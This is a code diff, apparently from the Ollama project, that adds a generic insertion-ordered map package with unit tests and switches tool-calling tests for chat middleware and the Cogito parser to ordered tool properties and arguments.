func TestAPIToolCalling(t *testing.T) {
|
func TestAPIToolCalling(t *testing.T) {
|
||||||
initialTimeout := 60 * time.Second
|
initialTimeout := 60 * time.Second
|
||||||
streamTimeout := 60 * time.Second
|
streamTimeout := 60 * time.Second
|
||||||
|
|
@ -57,12 +66,12 @@ func TestAPIToolCalling(t *testing.T) {
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "The city and state, e.g. San Francisco, CA",
|
Description: "The city and state, e.g. San Francisco, CA",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
|
||||||
|
|
@ -0,0 +1,94 @@
|
||||||
|
// Package orderedmap provides a generic ordered map that maintains insertion order.
|
||||||
|
// It wraps github.com/wk8/go-ordered-map/v2 to encapsulate the dependency.
|
||||||
|
package orderedmap
|
||||||
|
|
||||||
|
import (
|
||||||
|
"encoding/json"
|
||||||
|
"iter"
|
||||||
|
|
||||||
|
orderedmap "github.com/wk8/go-ordered-map/v2"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Map is a generic ordered map that maintains insertion order.
|
||||||
|
type Map[K comparable, V any] struct {
|
||||||
|
om *orderedmap.OrderedMap[K, V]
|
||||||
|
}
|
||||||
|
|
||||||
|
// New creates a new empty ordered map.
|
||||||
|
func New[K comparable, V any]() *Map[K, V] {
|
||||||
|
return &Map[K, V]{
|
||||||
|
om: orderedmap.New[K, V](),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Get retrieves a value by key.
|
||||||
|
func (m *Map[K, V]) Get(key K) (V, bool) {
|
||||||
|
if m == nil || m.om == nil {
|
||||||
|
var zero V
|
||||||
|
return zero, false
|
||||||
|
}
|
||||||
|
return m.om.Get(key)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Set sets a key-value pair. If the key already exists, its value is updated
|
||||||
|
// but its position in the iteration order is preserved. If the key is new,
|
||||||
|
// it is appended to the end.
|
||||||
|
func (m *Map[K, V]) Set(key K, value V) {
|
||||||
|
if m == nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if m.om == nil {
|
||||||
|
m.om = orderedmap.New[K, V]()
|
||||||
|
}
|
||||||
|
m.om.Set(key, value)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Len returns the number of entries.
|
||||||
|
func (m *Map[K, V]) Len() int {
|
||||||
|
if m == nil || m.om == nil {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
return m.om.Len()
|
||||||
|
}
|
||||||
|
|
||||||
|
// All returns an iterator over all key-value pairs in insertion order.
|
||||||
|
func (m *Map[K, V]) All() iter.Seq2[K, V] {
|
||||||
|
return func(yield func(K, V) bool) {
|
||||||
|
if m == nil || m.om == nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
for pair := m.om.Oldest(); pair != nil; pair = pair.Next() {
|
||||||
|
if !yield(pair.Key, pair.Value) {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// ToMap converts to a regular Go map.
|
||||||
|
// Note: The resulting map does not preserve order.
|
||||||
|
func (m *Map[K, V]) ToMap() map[K]V {
|
||||||
|
if m == nil || m.om == nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
result := make(map[K]V, m.om.Len())
|
||||||
|
for pair := m.om.Oldest(); pair != nil; pair = pair.Next() {
|
||||||
|
result[pair.Key] = pair.Value
|
||||||
|
}
|
||||||
|
return result
|
||||||
|
}
|
||||||
|
|
||||||
|
// MarshalJSON implements json.Marshaler. The JSON output preserves key order.
|
||||||
|
func (m *Map[K, V]) MarshalJSON() ([]byte, error) {
|
||||||
|
if m == nil || m.om == nil {
|
||||||
|
return []byte("null"), nil
|
||||||
|
}
|
||||||
|
return json.Marshal(m.om)
|
||||||
|
}
|
||||||
|
|
||||||
|
// UnmarshalJSON implements json.Unmarshaler. The insertion order matches the
|
||||||
|
// order of keys in the JSON input.
|
||||||
|
func (m *Map[K, V]) UnmarshalJSON(data []byte) error {
|
||||||
|
m.om = orderedmap.New[K, V]()
|
||||||
|
return json.Unmarshal(data, &m.om)
|
||||||
|
}
|
||||||
|
|
@ -0,0 +1,348 @@
|
||||||
|
package orderedmap
|
||||||
|
|
||||||
|
import (
|
||||||
|
"encoding/json"
|
||||||
|
"slices"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestMap_BasicOperations(t *testing.T) {
|
||||||
|
m := New[string, int]()
|
||||||
|
|
||||||
|
// Test empty map
|
||||||
|
if m.Len() != 0 {
|
||||||
|
t.Errorf("expected Len() = 0, got %d", m.Len())
|
||||||
|
}
|
||||||
|
v, ok := m.Get("a")
|
||||||
|
if ok {
|
||||||
|
t.Error("expected Get on empty map to return false")
|
||||||
|
}
|
||||||
|
if v != 0 {
|
||||||
|
t.Errorf("expected zero value, got %d", v)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Test Set and Get
|
||||||
|
m.Set("a", 1)
|
||||||
|
m.Set("b", 2)
|
||||||
|
m.Set("c", 3)
|
||||||
|
|
||||||
|
if m.Len() != 3 {
|
||||||
|
t.Errorf("expected Len() = 3, got %d", m.Len())
|
||||||
|
}
|
||||||
|
|
||||||
|
v, ok = m.Get("a")
|
||||||
|
if !ok || v != 1 {
|
||||||
|
t.Errorf("expected Get(a) = (1, true), got (%d, %v)", v, ok)
|
||||||
|
}
|
||||||
|
|
||||||
|
v, ok = m.Get("b")
|
||||||
|
if !ok || v != 2 {
|
||||||
|
t.Errorf("expected Get(b) = (2, true), got (%d, %v)", v, ok)
|
||||||
|
}
|
||||||
|
|
||||||
|
v, ok = m.Get("c")
|
||||||
|
if !ok || v != 3 {
|
||||||
|
t.Errorf("expected Get(c) = (3, true), got (%d, %v)", v, ok)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Test updating existing key preserves position
|
||||||
|
m.Set("a", 10)
|
||||||
|
v, ok = m.Get("a")
|
||||||
|
if !ok || v != 10 {
|
||||||
|
t.Errorf("expected Get(a) = (10, true), got (%d, %v)", v, ok)
|
||||||
|
}
|
||||||
|
if m.Len() != 3 {
|
||||||
|
t.Errorf("expected Len() = 3 after update, got %d", m.Len())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMap_InsertionOrderPreserved(t *testing.T) {
|
||||||
|
m := New[string, int]()
|
||||||
|
|
||||||
|
// Insert in non-alphabetical order
|
||||||
|
m.Set("z", 1)
|
||||||
|
m.Set("a", 2)
|
||||||
|
m.Set("m", 3)
|
||||||
|
m.Set("b", 4)
|
||||||
|
|
||||||
|
// Verify iteration order matches insertion order
|
||||||
|
var keys []string
|
||||||
|
var values []int
|
||||||
|
for k, v := range m.All() {
|
||||||
|
keys = append(keys, k)
|
||||||
|
values = append(values, v)
|
||||||
|
}
|
||||||
|
|
||||||
|
expectedKeys := []string{"z", "a", "m", "b"}
|
||||||
|
expectedValues := []int{1, 2, 3, 4}
|
||||||
|
|
||||||
|
if !slices.Equal(keys, expectedKeys) {
|
||||||
|
t.Errorf("expected keys %v, got %v", expectedKeys, keys)
|
||||||
|
}
|
||||||
|
if !slices.Equal(values, expectedValues) {
|
||||||
|
t.Errorf("expected values %v, got %v", expectedValues, values)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMap_UpdatePreservesPosition(t *testing.T) {
|
||||||
|
m := New[string, int]()
|
||||||
|
|
||||||
|
m.Set("first", 1)
|
||||||
|
m.Set("second", 2)
|
||||||
|
m.Set("third", 3)
|
||||||
|
|
||||||
|
// Update middle element
|
||||||
|
m.Set("second", 20)
|
||||||
|
|
||||||
|
var keys []string
|
||||||
|
for k := range m.All() {
|
||||||
|
keys = append(keys, k)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Order should still be first, second, third
|
||||||
|
expected := []string{"first", "second", "third"}
|
||||||
|
if !slices.Equal(keys, expected) {
|
||||||
|
t.Errorf("expected keys %v, got %v", expected, keys)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMap_MarshalJSON_PreservesOrder(t *testing.T) {
|
||||||
|
m := New[string, int]()
|
||||||
|
|
||||||
|
// Insert in non-alphabetical order
|
||||||
|
m.Set("z", 1)
|
||||||
|
m.Set("a", 2)
|
||||||
|
m.Set("m", 3)
|
||||||
|
|
||||||
|
data, err := json.Marshal(m)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Marshal failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// JSON should preserve insertion order, not alphabetical
|
||||||
|
expected := `{"z":1,"a":2,"m":3}`
|
||||||
|
if string(data) != expected {
|
||||||
|
t.Errorf("expected %s, got %s", expected, string(data))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMap_UnmarshalJSON_PreservesOrder(t *testing.T) {
|
||||||
|
// JSON with non-alphabetical key order
|
||||||
|
jsonData := `{"z":1,"a":2,"m":3}`
|
||||||
|
|
||||||
|
m := New[string, int]()
|
||||||
|
if err := json.Unmarshal([]byte(jsonData), m); err != nil {
|
||||||
|
t.Fatalf("Unmarshal failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Verify iteration order matches JSON order
|
||||||
|
var keys []string
|
||||||
|
for k := range m.All() {
|
||||||
|
keys = append(keys, k)
|
||||||
|
}
|
||||||
|
|
||||||
|
expected := []string{"z", "a", "m"}
|
||||||
|
if !slices.Equal(keys, expected) {
|
||||||
|
t.Errorf("expected keys %v, got %v", expected, keys)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMap_JSONRoundTrip(t *testing.T) {
|
||||||
|
// Test that unmarshal -> marshal produces identical JSON
|
||||||
|
original := `{"zebra":"z","apple":"a","mango":"m","banana":"b"}`
|
||||||
|
|
||||||
|
m := New[string, string]()
|
||||||
|
if err := json.Unmarshal([]byte(original), m); err != nil {
|
||||||
|
t.Fatalf("Unmarshal failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
data, err := json.Marshal(m)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Marshal failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if string(data) != original {
|
||||||
|
t.Errorf("round trip failed: expected %s, got %s", original, string(data))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMap_ToMap(t *testing.T) {
|
||||||
|
m := New[string, int]()
|
||||||
|
m.Set("a", 1)
|
||||||
|
m.Set("b", 2)
|
||||||
|
|
||||||
|
regular := m.ToMap()
|
||||||
|
|
||||||
|
if len(regular) != 2 {
|
||||||
|
t.Errorf("expected len 2, got %d", len(regular))
|
||||||
|
}
|
||||||
|
if regular["a"] != 1 {
|
||||||
|
t.Errorf("expected regular[a] = 1, got %d", regular["a"])
|
||||||
|
}
|
||||||
|
if regular["b"] != 2 {
|
||||||
|
t.Errorf("expected regular[b] = 2, got %d", regular["b"])
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMap_NilSafety(t *testing.T) {
|
||||||
|
var m *Map[string, int]
|
||||||
|
|
||||||
|
// All operations should be safe on nil
|
||||||
|
if m.Len() != 0 {
|
||||||
|
t.Errorf("expected Len() = 0 on nil map, got %d", m.Len())
|
||||||
|
}
|
||||||
|
|
||||||
|
v, ok := m.Get("a")
|
||||||
|
if ok {
|
||||||
|
t.Error("expected Get on nil map to return false")
|
||||||
|
}
|
||||||
|
if v != 0 {
|
||||||
|
t.Errorf("expected zero value from nil map, got %d", v)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Set on nil is a no-op
|
||||||
|
m.Set("a", 1)
|
||||||
|
if m.Len() != 0 {
|
||||||
|
t.Errorf("expected Len() = 0 after Set on nil, got %d", m.Len())
|
||||||
|
}
|
||||||
|
|
||||||
|
// All returns empty iterator
|
||||||
|
var keys []string
|
||||||
|
for k := range m.All() {
|
||||||
|
keys = append(keys, k)
|
||||||
|
}
|
||||||
|
if len(keys) != 0 {
|
||||||
|
t.Errorf("expected empty iteration on nil map, got %v", keys)
|
||||||
|
}
|
||||||
|
|
||||||
|
// ToMap returns nil
|
||||||
|
if m.ToMap() != nil {
|
||||||
|
t.Error("expected ToMap to return nil on nil map")
|
||||||
|
}
|
||||||
|
|
||||||
|
// MarshalJSON returns null
|
||||||
|
data, err := json.Marshal(m)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Marshal failed: %v", err)
|
||||||
|
}
|
||||||
|
if string(data) != "null" {
|
||||||
|
t.Errorf("expected null, got %s", string(data))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMap_EmptyMapMarshal(t *testing.T) {
|
||||||
|
m := New[string, int]()
|
||||||
|
|
||||||
|
data, err := json.Marshal(m)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Marshal failed: %v", err)
|
||||||
|
}
|
||||||
|
if string(data) != "{}" {
|
||||||
|
t.Errorf("expected {}, got %s", string(data))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMap_NestedValues(t *testing.T) {
|
||||||
|
m := New[string, any]()
|
||||||
|
m.Set("string", "hello")
|
||||||
|
m.Set("number", 42)
|
||||||
|
m.Set("bool", true)
|
||||||
|
m.Set("nested", map[string]int{"x": 1})
|
||||||
|
|
||||||
|
data, err := json.Marshal(m)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Marshal failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
expected := `{"string":"hello","number":42,"bool":true,"nested":{"x":1}}`
|
||||||
|
if string(data) != expected {
|
||||||
|
t.Errorf("expected %s, got %s", expected, string(data))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMap_AllIteratorEarlyExit(t *testing.T) {
|
||||||
|
m := New[string, int]()
|
||||||
|
m.Set("a", 1)
|
||||||
|
m.Set("b", 2)
|
||||||
|
m.Set("c", 3)
|
||||||
|
m.Set("d", 4)
|
||||||
|
|
||||||
|
// Collect only first 2
|
||||||
|
var keys []string
|
||||||
|
for k := range m.All() {
|
||||||
|
keys = append(keys, k)
|
||||||
|
if len(keys) == 2 {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
expected := []string{"a", "b"}
|
||||||
|
if !slices.Equal(keys, expected) {
|
||||||
|
t.Errorf("expected %v, got %v", expected, keys)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMap_IntegerKeys(t *testing.T) {
|
||||||
|
m := New[int, string]()
|
||||||
|
m.Set(3, "three")
|
||||||
|
m.Set(1, "one")
|
||||||
|
m.Set(2, "two")
|
||||||
|
|
||||||
|
var keys []int
|
||||||
|
for k := range m.All() {
|
||||||
|
keys = append(keys, k)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Should preserve insertion order, not numerical order
|
||||||
|
expected := []int{3, 1, 2}
|
||||||
|
if !slices.Equal(keys, expected) {
|
||||||
|
t.Errorf("expected %v, got %v", expected, keys)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMap_UnmarshalIntoExisting(t *testing.T) {
|
||||||
|
m := New[string, int]()
|
||||||
|
m.Set("existing", 999)
|
||||||
|
|
||||||
|
// Unmarshal should replace contents
|
||||||
|
if err := json.Unmarshal([]byte(`{"new":1}`), m); err != nil {
|
||||||
|
t.Fatalf("Unmarshal failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
_, ok := m.Get("existing")
|
||||||
|
if ok {
|
||||||
|
t.Error("existing key should be gone after unmarshal")
|
||||||
|
}
|
||||||
|
|
||||||
|
v, ok := m.Get("new")
|
||||||
|
if !ok || v != 1 {
|
||||||
|
t.Errorf("expected Get(new) = (1, true), got (%d, %v)", v, ok)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMap_LargeOrderPreservation(t *testing.T) {
|
||||||
|
m := New[string, int]()
|
||||||
|
|
||||||
|
// Create many keys in specific order
|
||||||
|
keys := make([]string, 100)
|
||||||
|
for i := range 100 {
|
||||||
|
keys[i] = string(rune('a' + (99 - i))) // reverse order: 'd', 'c', 'b', 'a' (extended)
|
||||||
|
if i >= 26 {
|
||||||
|
keys[i] = string(rune('A'+i-26)) + string(rune('a'+i%26))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for i, k := range keys {
|
||||||
|
m.Set(k, i)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Verify order preserved
|
||||||
|
var resultKeys []string
|
||||||
|
for k := range m.All() {
|
||||||
|
resultKeys = append(resultKeys, k)
|
||||||
|
}
|
||||||
|
|
||||||
|
if !slices.Equal(keys, resultKeys) {
|
||||||
|
t.Error("large map should preserve insertion order")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
@ -19,6 +19,40 @@ import (
|
||||||
"github.com/ollama/ollama/openai"
|
"github.com/ollama/ollama/openai"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests)
|
||||||
|
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
|
||||||
|
props := api.NewToolPropertiesMap()
|
||||||
|
for k, v := range m {
|
||||||
|
props.Set(k, v)
|
||||||
|
}
|
||||||
|
return props
|
||||||
|
}
|
||||||
|
|
||||||
|
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests)
|
||||||
|
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
|
||||||
|
args := api.NewToolCallFunctionArguments()
|
||||||
|
for k, v := range m {
|
||||||
|
args.Set(k, v)
|
||||||
|
}
|
||||||
|
return args
|
||||||
|
}
|
||||||
|
|
||||||
|
// argsComparer provides cmp options for comparing ToolCallFunctionArguments by value
|
||||||
|
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
|
||||||
|
return cmp.Equal(a.ToMap(), b.ToMap())
|
||||||
|
})
|
||||||
|
|
||||||
|
// propsComparer provides cmp options for comparing ToolPropertiesMap by value
|
||||||
|
var propsComparer = cmp.Comparer(func(a, b *api.ToolPropertiesMap) bool {
|
||||||
|
if a == nil && b == nil {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
if a == nil || b == nil {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
return cmp.Equal(a.ToMap(), b.ToMap())
|
||||||
|
})
|
||||||
|
|
||||||
const (
|
const (
|
||||||
prefix = `data:image/jpeg;base64,`
|
prefix = `data:image/jpeg;base64,`
|
||||||
image = `iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=`
|
image = `iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=`
|
||||||
|
|
@ -221,10 +255,10 @@ func TestChatMiddleware(t *testing.T) {
|
||||||
ID: "id",
|
ID: "id",
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_current_weather",
|
Name: "get_current_weather",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris, France",
|
"location": "Paris, France",
|
||||||
"format": "celsius",
|
"format": "celsius",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -261,10 +295,10 @@ func TestChatMiddleware(t *testing.T) {
|
||||||
ID: "id",
|
ID: "id",
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_current_weather",
|
Name: "get_current_weather",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris, France",
|
"location": "Paris, France",
|
||||||
"format": "celsius",
|
"format": "celsius",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -300,10 +334,10 @@ func TestChatMiddleware(t *testing.T) {
|
||||||
ID: "id",
|
ID: "id",
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_current_weather",
|
Name: "get_current_weather",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris, France",
|
"location": "Paris, France",
|
||||||
"format": "celsius",
|
"format": "celsius",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -340,10 +374,10 @@ func TestChatMiddleware(t *testing.T) {
|
||||||
ID: "id",
|
ID: "id",
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_current_weather",
|
Name: "get_current_weather",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris, France",
|
"location": "Paris, France",
|
||||||
"format": "celsius",
|
"format": "celsius",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -380,10 +414,10 @@ func TestChatMiddleware(t *testing.T) {
|
||||||
ID: "id_abc",
|
ID: "id_abc",
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_current_weather",
|
Name: "get_current_weather",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris, France",
|
"location": "Paris, France",
|
||||||
"format": "celsius",
|
"format": "celsius",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -426,10 +460,10 @@ func TestChatMiddleware(t *testing.T) {
|
||||||
ID: "id",
|
ID: "id",
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_current_weather",
|
Name: "get_current_weather",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris, France",
|
"location": "Paris, France",
|
||||||
"format": "celsius",
|
"format": "celsius",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -494,7 +528,7 @@ func TestChatMiddleware(t *testing.T) {
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "The city and state",
|
Description: "The city and state",
|
||||||
|
|
@ -503,7 +537,7 @@ func TestChatMiddleware(t *testing.T) {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Enum: []any{"celsius", "fahrenheit"},
|
Enum: []any{"celsius", "fahrenheit"},
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -558,7 +592,7 @@ func TestChatMiddleware(t *testing.T) {
|
||||||
}
|
}
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
if diff := cmp.Diff(&tc.req, capturedRequest); diff != "" {
|
if diff := cmp.Diff(&tc.req, capturedRequest, argsComparer, propsComparer); diff != "" {
|
||||||
t.Fatalf("requests did not match: %+v", diff)
|
t.Fatalf("requests did not match: %+v", diff)
|
||||||
}
|
}
|
||||||
if diff := cmp.Diff(tc.err, errResp); diff != "" {
|
if diff := cmp.Diff(tc.err, errResp); diff != "" {
|
||||||
|
|
|
||||||
|
|
@ -40,9 +40,9 @@ func TestCogitoParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -52,9 +52,9 @@ func TestCogitoParser(t *testing.T) {
|
||||||
Function: api.ToolFunction{
|
Function: api.ToolFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {Type: api.PropertyType{"string"}},
|
"location": {Type: api.PropertyType{"string"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -71,9 +71,9 @@ func TestCogitoParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -83,9 +83,9 @@ func TestCogitoParser(t *testing.T) {
|
||||||
Function: api.ToolFunction{
|
Function: api.ToolFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {Type: api.PropertyType{"string"}},
|
"location": {Type: api.PropertyType{"string"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -103,17 +103,17 @@ func TestCogitoParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "London",
|
"location": "London",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -123,9 +123,9 @@ func TestCogitoParser(t *testing.T) {
|
||||||
Function: api.ToolFunction{
|
Function: api.ToolFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {Type: api.PropertyType{"string"}},
|
"location": {Type: api.PropertyType{"string"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -140,11 +140,11 @@ func TestCogitoParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "process_data",
|
Name: "process_data",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"items": []any{"item1", "item2"},
|
"items": []any{"item1", "item2"},
|
||||||
"config": map[string]any{"enabled": true, "threshold": 0.95},
|
"config": map[string]any{"enabled": true, "threshold": 0.95},
|
||||||
"count": 42.0,
|
"count": 42.0,
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -238,7 +238,7 @@ This is line 3</think>Final response here.`,
|
||||||
t.Errorf("thinking mismatch (-want +got):\n%s", diff)
|
t.Errorf("thinking mismatch (-want +got):\n%s", diff)
|
||||||
}
|
}
|
||||||
|
|
||||||
if diff := cmp.Diff(tt.expectedToolCalls, toolCalls); diff != "" {
|
if diff := cmp.Diff(tt.expectedToolCalls, toolCalls, argsComparer); diff != "" {
|
||||||
t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
|
t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
@ -277,9 +277,9 @@ func TestCogitoParser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "test_tool",
|
Name: "test_tool",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"arg": "value",
|
"arg": "value",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
@ -292,7 +292,7 @@ func TestCogitoParser_Streaming(t *testing.T) {
|
||||||
t.Errorf("expected thinking %q, got %q", expectedThinking, finalThinking.String())
|
